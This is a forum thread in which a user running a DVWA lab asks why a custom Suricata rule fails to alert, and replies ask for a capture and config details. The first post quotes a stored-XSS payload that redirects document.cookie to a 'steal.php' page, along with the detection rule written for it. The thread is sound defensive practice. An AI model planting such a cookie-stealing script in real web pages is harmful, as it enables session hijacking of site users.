My suricata is not alerting me with the rule I created

Good day everyone,

My suricata is currently installed in my azure Kali linux vm and inside the vm is a website which is ( GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)). I have a second attacker Kali linux vm which accesses the website and injects this script to simulate an attack in a comment box.

<script>document.location='127.0.0.1/steal.php?cookie='+document.cookie;<script>

My Suricata is configured to my VM’s eth0 IP since the website is local host and the stream: checksum validation is off because its generating an error in my fast.log file before. I can see the website traffic in the eve.json file and I can see that no packets are being lost in the stat.log, but its not alerting me. I have this one rule configured to catch that one specific attack but its not working

alert http any any → $HOME_NET any (msg:“Attempted cookie theft using JavaScript”; content:“document.location=”; nocase; http_client_body; content:“steal.php?cookie=”; nocase; http_client_body; content:“document.cookie”; nocase; http_client_body; classtype:web-application-attack; sid:1999991; rev:1;)

What is wrong with my rule or system?

Can you get a packet capture of the attack and share it? Also, is it safe to assume that the web server IP is included in $HOME_NET? Did you check the request-body-limit in the suricata config to ensure the traffic isn’t beyond the inspection buffer?

1 Like

Wireshark log.pcapng (43.4 KB)

Hi there, sorry for the long reply. Here’s the packet capture of the attack. I still dont understand what rule is needed to capture it. The attack is done in an http site on localhost. We tried other attacks like sql injection and our rules managed to detect them.

What Suricata version are you using?
How does your suricata.yaml look like and how do you run Suricata?
Do you see the flow event for this specific test or is that missing as well?